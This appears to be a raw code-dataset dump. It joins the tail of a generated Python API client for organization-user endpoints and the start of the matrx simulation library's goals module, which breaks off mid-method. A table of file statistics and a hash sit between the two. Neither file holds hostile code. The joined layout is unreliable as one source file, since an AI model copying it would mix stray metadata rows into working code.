    (a function invoked with the response) switches the call to
    asynchronous mode, in which case the request thread is returned.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str organization_id: The organization ID Guid (required)
    :param int start: Index of first item to include in the response Default value: 0
    :param int take: Page size of the response Default value: 20
    :param int end: Index of the last item to include in the response. Ignored if 'take' parameter is specfied
    :param str email: Email address of the desired user. At least one of email, account_id or organization_reserved_domain_id must be specified.
    :param str email_user_name_like: Selects users by pattern matching on the user's email address
    :param str status: Select users based on user status
    :param str membership_status: Select users based on membership status
    :param str account_id: Select users that are members of the specified account. At least one of email, account_id or organization_reserved_domain_id must be specified.
    :param str organization_reserved_domain_id: Select users that are in the specified domain. At least one of email, account_id or organization_reserved_domain_id must be specified.
    :param str last_modified_since: Select users whose data have been modified since the date specified; account_id or organization_reserved_domain_id must be specified.
    :return: OrganizationUsersResponse
        If the method is called asynchronously,
        returns the request thread.
    """
    # Callers of this wrapper want only the payload, not the
    # (data, status, headers) triple.
    kwargs['_return_http_data_only'] = True
    # The helper already returns the right thing in both modes: the
    # response data synchronously, or the request thread with a callback.
    return self.get_users_with_http_info(organization_id, **kwargs)
def get_users_with_http_info(self, organization_id, **kwargs):
    """
    Returns information about the users in the organization
    Required scopes: user_read
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>> pprint(response)
    >>>
    >>> thread = api.get_users_with_http_info(organization_id, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str organization_id: The organization ID Guid (required)
    :param int start: Index of first item to include in the response Default value: 0
    :param int take: Page size of the response Default value: 20
    :param int end: Index of the last item to include in the response. Ignored if 'take' parameter is specfied
    :param str email: Email address of the desired user. At least one of email, account_id or organization_reserved_domain_id must be specified.
    :param str email_user_name_like: Selects users by pattern matching on the user's email address
    :param str status: Select users based on user status
    :param str membership_status: Select users based on membership status
    :param str account_id: Select users that are members of the specified account. At least one of email, account_id or organization_reserved_domain_id must be specified.
    :param str organization_reserved_domain_id: Select users that are in the specified domain. At least one of email, account_id or organization_reserved_domain_id must be specified.
    :param str last_modified_since: Select users whose data have been modified since the date specified; account_id or organization_reserved_domain_id must be specified.
    :return: OrganizationUsersResponse
        If the method is called asynchronously,
        returns the request thread.
    """
    # Whitelist of keywords this method accepts: the endpoint's own
    # parameters plus the transport options shared by every API method.
    all_params = ['organization_id', 'start', 'take', 'end', 'email', 'email_user_name_like', 'status', 'membership_status', 'account_id', 'organization_reserved_domain_id', 'last_modified_since']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Snapshot the named arguments, then fold **kwargs into the same
    # dict, rejecting any keyword not in the whitelist above.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_users" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'organization_id' is set
    if ('organization_id' not in params) or (params['organization_id'] is None):
        raise ValueError("Missing the required parameter `organization_id` when calling `get_users`")

    collection_formats = {}

    # Endpoint template; the '{format}' placeholder is generator legacy
    # and always resolves to 'json'.
    resource_path = '/v2/organizations/{organizationId}/users'.replace('{format}', 'json')
    path_params = {}
    if 'organization_id' in params:
        path_params['organizationId'] = params['organization_id']

    # Optional paging and filter arguments, forwarded as query-string
    # parameters only when the caller supplied them.
    query_params = {}
    if 'start' in params:
        query_params['start'] = params['start']
    if 'take' in params:
        query_params['take'] = params['take']
    if 'end' in params:
        query_params['end'] = params['end']
    if 'email' in params:
        query_params['email'] = params['email']
    if 'email_user_name_like' in params:
        query_params['email_user_name_like'] = params['email_user_name_like']
    if 'status' in params:
        query_params['status'] = params['status']
    if 'membership_status' in params:
        query_params['membership_status'] = params['membership_status']
    if 'account_id' in params:
        query_params['account_id'] = params['account_id']
    if 'organization_reserved_domain_id' in params:
        query_params['organization_reserved_domain_id'] = params['organization_reserved_domain_id']
    if 'last_modified_since' in params:
        query_params['last_modified_since'] = params['last_modified_since']

    header_params = {}

    form_params = []
    local_var_files = {}

    # GET request: no request body is sent.
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json'])

    # Authentication setting
    auth_settings = []

    # Delegate the HTTP GET to the shared API client, which performs
    # the call and deserializes the response into `response_type`.
    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='OrganizationUsersResponse',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats=collection_formats)
def update_email_address(self, organization_id, request, **kwargs):
    """
    Updates a user's email address.
    Required scopes: user_write

    By default this performs a blocking HTTP request and returns the
    deserialized response data. Supplying a `callback` keyword argument
    (a function invoked with the response) switches the call to
    asynchronous mode, in which case the request thread is returned.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str organization_id: The organization ID Guid (required)
    :param UpdateUsersEmailRequest request: The details about which email addresses to update (required)
    :return: UsersUpdateResponse
        If the method is called asynchronously,
        returns the request thread.
    """
    # Callers of this wrapper want only the payload, not the
    # (data, status, headers) triple.
    kwargs['_return_http_data_only'] = True
    # The helper already returns the right thing in both modes: the
    # response data synchronously, or the request thread with a callback.
    return self.update_email_address_with_http_info(organization_id, request, **kwargs)
def update_email_address_with_http_info(self, organization_id, request, **kwargs):
    """
    Updates a user's email address.
    Required scopes: user_write
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>> pprint(response)
    >>>
    >>> thread = api.update_email_address_with_http_info(organization_id, request, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str organization_id: The organization ID Guid (required)
    :param UpdateUsersEmailRequest request: The details about which email addresses to update (required)
    :return: UsersUpdateResponse
        If the method is called asynchronously,
        returns the request thread.
    """
    # Whitelist of keywords this method accepts: the endpoint's own
    # parameters plus the transport options shared by every API method.
    all_params = ['organization_id', 'request']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Snapshot the named arguments, then fold **kwargs into the same
    # dict, rejecting any keyword not in the whitelist above.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_email_address" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'organization_id' is set
    if ('organization_id' not in params) or (params['organization_id'] is None):
        raise ValueError("Missing the required parameter `organization_id` when calling `update_email_address`")
    # verify the required parameter 'request' is set
    if ('request' not in params) or (params['request'] is None):
        raise ValueError("Missing the required parameter `request` when calling `update_email_address`")

    collection_formats = {}

    # Endpoint template; the '{format}' placeholder is generator legacy
    # and always resolves to 'json'.
    resource_path = '/v2/organizations/{organizationId}/users/email_addresses'.replace('{format}', 'json')
    path_params = {}
    if 'organization_id' in params:
        path_params['organizationId'] = params['organization_id']

    query_params = {}

    header_params = {}

    form_params = []
    local_var_files = {}

    # The request model object is serialized as the JSON request body.
    body_params = None
    if 'request' in params:
        body_params = params['request']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json'])

    # Authentication setting
    auth_settings = []

    # Delegate the HTTP POST to the shared API client, which performs
    # the call and deserializes the response into `response_type`.
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='UsersUpdateResponse',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats=collection_formats)
def update_user(self, organization_id, request, **kwargs):
    """
    Updates a user.
    Required scopes: user_write

    By default this performs a blocking HTTP request and returns the
    deserialized response data. Supplying a `callback` keyword argument
    (a function invoked with the response) switches the call to
    asynchronous mode, in which case the request thread is returned.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str organization_id: The organization ID Guid (required)
    :param UpdateUsersRequest request: The user details to update (required)
    :return: UsersUpdateResponse
        If the method is called asynchronously,
        returns the request thread.
    """
    # Callers of this wrapper want only the payload, not the
    # (data, status, headers) triple.
    kwargs['_return_http_data_only'] = True
    # The helper already returns the right thing in both modes: the
    # response data synchronously, or the request thread with a callback.
    return self.update_user_with_http_info(organization_id, request, **kwargs)
def update_user_with_http_info(self, organization_id, request, **kwargs):
    """
    Updates a user.
    Required scopes: user_write

    The request is performed synchronously unless a `callback` keyword
    argument is supplied, in which case the HTTP request is made
    asynchronously and the request thread is returned; the callback is
    invoked with the deserialized response.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str organization_id: The organization ID Guid (required)
    :param UpdateUsersRequest request: The user details to update (required)
    :return: UsersUpdateResponse
        If the method is called asynchronously,
        returns the request thread.
    :raises TypeError: when an unknown keyword argument is supplied.
    :raises ValueError: when a required parameter is missing or None.
    """
    # Every keyword this method understands; anything else is a caller error.
    all_params = ['organization_id', 'request', 'callback',
                  '_return_http_data_only', '_preload_content',
                  '_request_timeout']

    params = {'organization_id': organization_id, 'request': request}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_user" % key
            )
        params[key] = val

    # verify the required parameter 'organization_id' is set
    if params['organization_id'] is None:
        raise ValueError("Missing the required parameter `organization_id` when calling `update_user`")
    # verify the required parameter 'request' is set
    if params['request'] is None:
        raise ValueError("Missing the required parameter `request` when calling `update_user`")

    collection_formats = {}

    resource_path = '/v2/organizations/{organizationId}/users/profiles'.replace('{format}', 'json')
    path_params = {'organizationId': params['organization_id']}
    query_params = {}
    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(['application/json']),
        # HTTP header `Content-Type`
        'Content-Type': self.api_client.select_header_content_type(['application/json']),
    }
    form_params = []
    local_var_files = {}
    body_params = params['request']

    # Authentication setting
    auth_settings = []

    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='UsersUpdateResponse',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats=collection_formats)
| 46.822967
| 200
| 0.602068
| 6,133
| 58,716
| 5.535464
| 0.041904
| 0.070105
| 0.028278
| 0.021208
| 0.953283
| 0.940882
| 0.936198
| 0.932104
| 0.92583
| 0.904857
| 0
| 0.000625
| 0.319112
| 58,716
| 1,253
| 201
| 46.860335
| 0.848545
| 0.342632
| 0
| 0.774038
| 0
| 0
| 0.212845
| 0.043371
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033654
| false
| 0
| 0.011218
| 0
| 0.094551
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1d576b4aeb3fea5dafc9568ed16cab8d52dc8153
| 34,115
|
py
|
Python
|
matrx/goals/goals.py
|
matrx-software/matrx
|
5b36ef1018e85172dc88cd7467e3087ef94c58ba
|
[
"MIT"
] | 6
|
2020-03-02T10:42:34.000Z
|
2021-05-16T12:21:25.000Z
|
matrx/goals/goals.py
|
matrx-software/matrx
|
5b36ef1018e85172dc88cd7467e3087ef94c58ba
|
[
"MIT"
] | 262
|
2020-02-27T13:37:40.000Z
|
2022-03-29T11:44:57.000Z
|
matrx/goals/goals.py
|
matrx-software/matrx
|
5b36ef1018e85172dc88cd7467e3087ef94c58ba
|
[
"MIT"
] | 3
|
2020-02-27T12:59:22.000Z
|
2021-12-10T13:53:58.000Z
|
import copy
import itertools
import warnings
import numpy as np
import matrx
from matrx import utils
from matrx.objects.standard_objects import CollectionTarget, CollectionDropOffTile
class WorldGoal:
    """
    A class that tracks whether the simulation has reached its global goal.

    .. deprecated:: 2.1.0
        `WorldGoal` will be removed in the future, it is replaced by
        `WorldGoalV2` because the latter works with the
        :class:`matrx.agents.agent_utils.state.State` object.
    """

    def __init__(self):
        """Mark the goal as not yet completed and warn about the deprecation."""
        cls_name = type(self).__name__
        warnings.warn(
            f"{cls_name} will be updated in the future towards {cls_name}V2. Switch to "
            f"the usage of {cls_name}V2 to prevent future problems.",
            DeprecationWarning,
        )
        self.is_done = False

    def goal_reached(self, grid_world):
        """Return whether the simulated grid world's global goal is reached.

        Subclasses override this; the base implementation does nothing.

        Parameters
        ----------
        grid_world : GridWorld
            An up to date representation of the grid world that is analyzed
            on whether a specific coded global goal is reached.

        Returns
        -------
        goal_reached : bool
            True when the goal is reached, False otherwise.
        """
        pass

    def get_progress(self, grid_world):
        """Return the progress towards the global goal.

        Subclasses may override this to track progress; it is not required.

        Parameters
        ----------
        grid_world : GridWorld
            An up to date representation of the grid world that is analyzed
            on how far we are in obtaining the global world goal.

        Returns
        -------
        progress : float
            0.0 means no progress made; 1.0 means the goal is reached.
        """
        pass

    def reset(self):
        """Reset this goal's completion boolean and return a copy of this object."""
        self.is_done = False
        return copy.deepcopy(self)
class LimitedTimeGoal(WorldGoal):
    """
    A world goal that simply tracks whether a maximum number of ticks has been reached.
    """

    def __init__(self, max_nr_ticks):
        """Initialize the LimitedTimeGoal by saving the `max_nr_ticks`."""
        super().__init__()
        self.max_nr_ticks = max_nr_ticks

    def goal_reached(self, grid_world):
        """Return whether the number of specified ticks has been reached.

        Parameters
        ----------
        grid_world : GridWorld
            An up to date representation of the grid world, used to read the
            current tick number.

        Returns
        -------
        goal_reached : bool
            True when the goal is reached, False otherwise. A limit of
            ``np.inf`` or a non-positive limit means the goal is never
            reached.
        """
        # An infinite or non-positive limit disables the goal entirely.
        limit_disabled = self.max_nr_ticks == np.inf or self.max_nr_ticks <= 0
        if limit_disabled:
            self.is_done = False
        else:
            self.is_done = grid_world.current_nr_ticks >= self.max_nr_ticks
        return self.is_done

    def get_progress(self, grid_world):
        """Return the progress of reaching this goal in the simulated grid world.

        Parameters
        ----------
        grid_world : GridWorld
            An up to date representation of the grid world, used to read the
            current tick number.

        Returns
        -------
        progress : float
            The fraction of ticks elapsed, capped at 1.0. Always 0.0 when the
            limit is ``np.inf`` or non-positive.

        Examples
        --------
        >>> progress = grid_world.simulation_goal.get_progress(grid_world)
        >>> print(f"The simulation is {progress * 100} percent complete!")
        """
        limit_disabled = self.max_nr_ticks == np.inf or self.max_nr_ticks <= 0
        if limit_disabled:
            return 0.
        fraction = grid_world.current_nr_ticks / self.max_nr_ticks
        return min(1.0, fraction)
class CollectionGoal(WorldGoal):
    """Goal reached when a requested set of objects is dropped in a collection area.

    Drop-off locations are all environment objects whose 'name' property equals
    the given area name. The requested objects are read from the
    'collection_objects' property of an environment object whose
    'collection_zone_name' equals that same area name and whose
    'is_drop_off_target' property is truthy. When `in_order` is True, the
    objects must be dropped in the order listed by 'collection_objects'.
    """

    def __init__(self, name, target_name, in_order=False):
        """Initialise the collection goal.

        Parameters
        ----------
        name : str
            Name of the collection area; matched against the 'name' property of
            drop-off objects and the 'collection_zone_name' of the target.
        target_name : str
            Name of the collection target. Stored, but not read by the
            completion logic in this class.
        in_order : bool (optional, default False)
            Whether the requested objects must be dropped off in the order
            listed by the target's 'collection_objects' property.
        """
        super().__init__()
        # Store the attributes
        self.__area_name = name
        self.__target_name = target_name
        self.__in_order = in_order
        # Set attributes we will use to speed up things and keep track of collected objects
        self.__drop_off_locs = None  # all locations where objects can be dropped off
        self.__target = None  # all (ordered) objects that need to be collected described in their properties
        self.__dropped_objects = {}  # a dictionary of the required dropped objects (id as key, tick as value)
        self.__attained_rank = 0  # The maximum attained rank of the correctly collected objects (only used if in_order)

    def goal_reached(self, grid_world):
        """Return whether all requested objects are currently dropped off.

        Lazily locates the drop-off locations and the requested objects on the
        first call, then delegates the actual check to `__check_completion`.

        Parameters
        ----------
        grid_world : GridWorld
            The grid world instance to inspect.

        Returns
        -------
        bool
            True when the collection goal is satisfied, False otherwise.

        Raises
        ------
        ValueError
            When no drop-off location with the configured area name is found.
        """
        if self.__drop_off_locs is None:  # find all drop off locations, its tile ID's and goal blocks
            self.__drop_off_locs = []
            self.__find_drop_off_locations(grid_world)

            # Raise exception if no drop off locations were found.
            if len(self.__drop_off_locs) == 0:
                raise ValueError(f"The CollectionGoal {self.__area_name} could not find a "
                                 f"{CollectionDropOffTile.__name__} with its 'collection_area_name' set to "
                                 f"{self.__area_name}.")

        if self.__target is None:  # find all objects that need to be collected (potentially in order)
            self.__target = []
            self.__find_collection_objects(grid_world)

        # Go all drop locations and check if the requested objects are there (potentially dropped in the right order)
        is_satisfied = self.__check_completion(grid_world)

        self.is_done = is_satisfied
        return is_satisfied

    def __find_drop_off_locations(self, grid_world):
        """Append to `__drop_off_locs` the location of every environment object
        whose 'name' property equals this goal's area name."""
        all_objs = grid_world.environment_objects
        for obj_id, obj in all_objs.items():
            if 'name' in obj.properties.keys() \
                    and self.__area_name == obj.properties['name']:
                loc = obj.location
                self.__drop_off_locs.append(loc)

    def __find_collection_objects(self, grid_world):
        """Copy the list of requested property-dicts from the collection target
        belonging to this goal's area into `__target`; warn if none is found."""
        all_objs = grid_world.environment_objects
        for obj_id, obj in all_objs.items():
            if 'collection_zone_name' in obj.properties.keys() \
                    and self.__area_name == obj.properties['collection_zone_name']\
                    and 'collection_objects' in obj.properties and 'is_drop_off_target' in obj.properties\
                    and obj.properties['is_drop_off_target']:
                self.__target = obj.properties['collection_objects'].copy()

        # Raise warning if no target object was found.
        if len(self.__target) == 0:
            warnings.warn(f"The CollectionGoal {self.__area_name} could not find a {CollectionTarget.__name__} "
                          f"object or its 'collection_objects' property is empty.")

    def __check_completion(self, grid_world):
        """Compare the objects currently at the drop-off locations against the
        requested objects and return whether the goal is satisfied.

        Maintains `__dropped_objects` (object id -> tick of first detection)
        across calls and, when order matters, updates `__attained_rank`.
        """
        # If we were already done before, we return the past values
        if self.is_done:
            return self.is_done

        # Get the current tick number
        curr_tick = grid_world.current_nr_ticks

        # Retrieve all objects and the drop locations (this is the most performance heavy; it loops over all drop locs
        # and queries the world to locate all objects at that point through distance calculation. Note: this calculation
        # is not required, as the range is zero!).
        obj_ids = [obj_id for loc in self.__drop_off_locs
                   for obj_id in grid_world.get_objects_in_range(loc, sense_range=0, object_type=None).keys()]

        # Get all world objects and agents
        all_objs = grid_world.environment_objects
        all_agents = grid_world.registered_agents
        all_ = {**all_objs, **all_agents}

        # Go through all objects at the drop off locations. If an object was not already detected before as a
        # required object, check if it is one of the desired objects. Also, ignore all drop off tiles and targets.
        detected_objs = {}
        for obj_id in obj_ids:
            obj_props = all_[obj_id].properties
            # Check if the object is either a collection area tile or a collection target object, if so skip it
            if ("is_drop_off" in obj_props.keys() and "collection_area_name" in obj_props.keys()) \
                    or ("is_drop_off_target" in obj_props.keys() and "collection_zone_name" in obj_props.keys()
                        and "is_invisible" in obj_props.keys()):
                continue
            # An object counts as detected when one of the requested property
            # dicts is a subset of its (flattened) properties.
            for req_props in self.__target:
                obj_props = utils._flatten_dict(obj_props)
                if req_props.items() <= obj_props.items():
                    detected_objs[obj_id] = curr_tick

        # Now compare the detected objects with the previous detected objects to see if any new objects were detected
        # and thus should be added to the dropped objects
        is_updated = False
        for obj_id in detected_objs.keys():
            if obj_id not in self.__dropped_objects.keys():
                is_updated = True
                self.__dropped_objects[obj_id] = detected_objs[obj_id]

        # Check if any objects detected previously are now not detected anymore, as such they need to be removed.
        removed = []
        for obj_id in self.__dropped_objects.keys():
            if obj_id not in detected_objs.keys():
                removed.append(obj_id)
        for obj_id in removed:
            is_updated = True
            self.__dropped_objects.pop(obj_id, None)

        # If required (and needed), check if the dropped objects are dropped in order by tracking the rank up which the
        # dropped objects satisfy the requested order.
        if self.__in_order and is_updated:
            # Sort the dropped objects based on the tick they were detected (in ascending order)
            sorted_dropped_obj = sorted(self.__dropped_objects.items(), key=lambda x: x[1], reverse=False)
            rank = 0
            for obj_id, tick in sorted_dropped_obj:
                props = all_[obj_id].properties
                props = utils._flatten_dict(props)
                req_props = self.__target[rank]
                if req_props.items() <= props.items():
                    rank += 1
                else:
                    # as soon as the next object is not the one we expect, we stop the search at this attained rank.
                    break
            # The goal is done as soon as the attained rank is equal to the number of requested objects
            is_satisfied = rank == len(self.__target)
            # Store the attained rank, used to measure the progress
            self.__attained_rank = rank
        # objects do not need to be collected in order and new ones were dropped
        elif is_updated:
            # The goal is done when the number of collected objects equal the number of requested objects
            is_satisfied = len(self.__dropped_objects) == len(self.__target)
        # no new objects detected, so just return the past values
        else:
            is_satisfied = self.is_done

        return is_satisfied

    def get_progress(self, grid_world):
        """Return the fraction of the requested objects that has been collected.

        When `in_order` is True this is the attained rank divided by the number
        of requested objects; otherwise it is the number of collected objects
        divided by the number of requested objects.
        """
        # If we are done, just return 1.0
        if self.is_done:
            return 1.0

        # Check if the order matters, if so calculated the progress based on the maximum attained rank of correct
        # ordered collected objects.
        if self.__in_order:
            # Progress is the currently attained rank divided by the number of requested objects
            progress = self.__attained_rank / len(self.__target)
        # If the order does not matter, just calculate the progress as the number of correctly collected/dropped
        # objects.
        else:
            # Progress the is the number of collected objects divided by the total number of requested objects
            progress = len(self.__dropped_objects) / len(self.__target)

        return progress

    @classmethod
    def get_random_order_property(cls, possibilities, length=None, with_duplicates=False):
        """ Creates a `RandomProperty` representing a list of potential objects to collect in a certain order.

        Parameters
        ----------
        possibilities: iterable
            An iterable (e.g. list, tuple, etc.) of dictionaries representing property_name, property_value pairs that
            can be collected.
        length: int (optional, default None)
            The number of objects that need to be sampled from `possibilities` to be collected.
        with_duplicates: bool (optional, default False)
            Whether entries in `possibilities` can occur more than once in the lists.

        Returns
        -------
        RandomProperty
            A random property representing all possible lists of collection objects. Each list differs in the order of
            the objects. If length < len(possibilities), not all objects may be in each list. If with_duplicates=True,
            some objects might occur more than once in a list. This random property can be given to a `CollectionGoal`
            who will sample one of these lists every time a world is run. This allows a world with a `CollectionGoal`
            to denote different collection goals each time but still based on all properties in `possibilities`.

        Examples
        --------
        >>> from matrx import WorldBuilder
        >>> from matrx.logger import LogActions
        >>> from matrx.objects import SquareBlock
        >>> from matrx.goals import CollectionGoal
        >>> builder = WorldBuilder(shape=(3, 3))
        >>> builder.add_object([0, 0], "Red Block", callable_class=SquareBlock, visualize_colour="#eb4034")
        >>> builder.add_object([1, 1], "Blue Block", callable_class=SquareBlock, visualize_colour="#3385e8")

        Add a collection goal, where we should collect red and blue blocks but every time we run the world, in a different
        order. To do so, we need to pass a RandomProperty to `add_collection_goal` which it uses to sample such an
        order each created world. We call this utility method to get us such a RandomProperty.

        >>> rp_order = CollectionGoal.get_random_order_property([{'visualize_colour': 'eb4034'}, {'visualize_colour': '3385e8'}])
        >>> builder.add_collection_goal("Drop", [(2, 2)], rp_order, in_order=True)

        See Also
        --------
        :meth:`matrx.world_builder.WorldBuilder.add_collection_goal`
            The method that receives this return value.
        :class:`matrx.world_builder.RandomProperty`
            The class representing a property with a random value each world creation.
        """
        # Default to using every possibility exactly once.
        if length is None:
            length = len(possibilities)

        if not with_duplicates:
            orders = itertools.permutations(possibilities, r=length)
        else:  # with_duplicates
            orders = itertools.product(possibilities, repeat=length)

        # Materialize the iterator so RandomProperty receives a concrete list.
        orders = list(orders)
        rp_orders = matrx.world_builder.RandomProperty(values=orders)

        return rp_orders
class WorldGoalV2:
    """
    A class that tracks whether the simulation has reached its global goal.
    """

    def __init__(self):
        """Mark the goal as not yet completed."""
        self.is_done = False

    def goal_reached(self, world_state, grid_world):
        """Return whether the simulated grid world's global goal is reached.

        Subclasses override this; the base implementation does nothing.

        Parameters
        ----------
        world_state : State
            The entire world state. Used to search and read objects within the
            world to check for world completion.
        grid_world : GridWorld
            The actual grid world instance. For access to components not
            present in the world state, such as the messages send between
            agents and user input from human agents.

        Returns
        -------
        goal_reached : bool
            True when the goal is reached, False otherwise.
        """
        pass

    def get_progress(self, world_state, grid_world):
        """Return the progress towards the global goal.

        Subclasses may override this to track progress; it is not required.

        Parameters
        ----------
        world_state : State
            The entire world state. Used to search and read objects within the
            world to check for world completion.
        grid_world : GridWorld
            The actual grid world instance. For access to components not
            present in the world state, such as the messages send between
            agents and user input from human agents.

        Returns
        -------
        progress : float
            0.0 means no progress made; 1.0 means the goal is reached.
        """
        pass

    def reset(self):
        """Reset this goal's completion boolean and return a copy of this object."""
        self.is_done = False
        return copy.deepcopy(self)
class LimitedTimeGoalV2(WorldGoalV2):
    """
    A world goal that simply tracks whether a maximum number of ticks has been reached.
    """

    def __init__(self, max_nr_ticks):
        """Initialize the LimitedTimeGoal by saving the `max_nr_ticks`."""
        super().__init__()
        self.max_nr_ticks = max_nr_ticks

    def goal_reached(self, world_state, grid_world):
        """Return whether the number of specified ticks has been reached.

        Parameters
        ----------
        world_state : State
            The entire world state. Not used by this goal.
        grid_world : GridWorld
            The actual grid world instance, used to read the current tick
            number.

        Returns
        -------
        goal_reached : bool
            True when the goal is reached, False otherwise. A limit of
            ``np.inf`` or a non-positive limit means the goal is never
            reached.
        """
        # An infinite or non-positive limit disables the goal entirely.
        limit_disabled = self.max_nr_ticks == np.inf or self.max_nr_ticks <= 0
        if limit_disabled:
            self.is_done = False
        else:
            self.is_done = grid_world.current_nr_ticks >= self.max_nr_ticks
        return self.is_done

    def get_progress(self, world_state, grid_world):
        """Return the progress of reaching this goal in the simulated grid world.

        Parameters
        ----------
        world_state : State
            The entire world state. Not used by this goal.
        grid_world : GridWorld
            The actual grid world instance, used to read the current tick
            number.

        Returns
        -------
        progress : float
            The fraction of ticks elapsed, capped at 1.0. Always 0.0 when the
            limit is ``np.inf`` or non-positive.

        Examples
        --------
        >>> progress = grid_world.simulation_goal.get_progress(grid_world)
        >>> print(f"The simulation is {progress * 100} percent complete!")
        """
        limit_disabled = self.max_nr_ticks == np.inf or self.max_nr_ticks <= 0
        if limit_disabled:
            return 0.
        fraction = grid_world.current_nr_ticks / self.max_nr_ticks
        return min(1.0, fraction)
class CollectionGoalV2(WorldGoalV2):
    """Goal reached when a requested set of objects is dropped in a collection area.

    V2 variant of `CollectionGoal` conforming to the `WorldGoalV2` interface.
    Drop-off locations are all environment objects whose 'name' property equals
    the given area name. The requested objects are read from the
    'collection_objects' property of an environment object whose
    'collection_zone_name' equals that same area name and whose
    'is_drop_off_target' property is truthy. When `in_order` is True, the
    objects must be dropped in the order listed by 'collection_objects'.
    """

    def __init__(self, name, target_name, in_order=False):
        """Initialise the collection goal.

        Parameters
        ----------
        name : str
            Name of the collection area; matched against the 'name' property of
            drop-off objects and the 'collection_zone_name' of the target.
        target_name : str
            Name of the collection target. Stored, but not read by the
            completion logic in this class.
        in_order : bool (optional, default False)
            Whether the requested objects must be dropped off in the order
            listed by the target's 'collection_objects' property.
        """
        super().__init__()
        # Store the attributes
        self.__area_name = name
        self.__target_name = target_name
        self.__in_order = in_order
        # Set attributes we will use to speed up things and keep track of collected objects
        self.__drop_off_locs = None  # all locations where objects can be dropped off
        self.__target = None  # all (ordered) objects that need to be collected described in their properties
        self.__dropped_objects = {}  # a dictionary of the required dropped objects (id as key, tick as value)
        self.__attained_rank = 0  # The maximum attained rank of the correctly collected objects (only used if in_order)

    def goal_reached(self, world_state, grid_world):
        """Return whether all requested objects are currently dropped off.

        Lazily locates the drop-off locations and the requested objects on the
        first call, then delegates the actual check to `__check_completion`.

        Parameters
        ----------
        world_state : State
            The entire world state. Not read by this implementation; the
            checks below use `grid_world` directly.
        grid_world : GridWorld
            The grid world instance to inspect.

        Returns
        -------
        bool
            True when the collection goal is satisfied, False otherwise.

        Raises
        ------
        ValueError
            When no drop-off location with the configured area name is found.
        """
        if self.__drop_off_locs is None:  # find all drop off locations, its tile ID's and goal blocks
            self.__drop_off_locs = []
            self.__find_drop_off_locations(grid_world)

            # Raise exception if no drop off locations were found.
            if len(self.__drop_off_locs) == 0:
                raise ValueError(f"The CollectionGoal {self.__area_name} could not find a "
                                 f"{CollectionDropOffTile.__name__} with its 'collection_area_name' set to "
                                 f"{self.__area_name}.")

        if self.__target is None:  # find all objects that need to be collected (potentially in order)
            self.__target = []
            self.__find_collection_objects(grid_world)

        # Go all drop locations and check if the requested objects are there (potentially dropped in the right order)
        is_satisfied = self.__check_completion(grid_world)

        self.is_done = is_satisfied
        return is_satisfied

    def __find_drop_off_locations(self, grid_world):
        """Append to `__drop_off_locs` the location of every environment object
        whose 'name' property equals this goal's area name."""
        all_objs = grid_world.environment_objects
        for obj_id, obj in all_objs.items():
            if 'name' in obj.properties.keys() \
                    and self.__area_name == obj.properties['name']:
                loc = obj.location
                self.__drop_off_locs.append(loc)

    def __find_collection_objects(self, grid_world):
        """Copy the list of requested property-dicts from the collection target
        belonging to this goal's area into `__target`; warn if none is found."""
        all_objs = grid_world.environment_objects
        for obj_id, obj in all_objs.items():
            if 'collection_zone_name' in obj.properties.keys() \
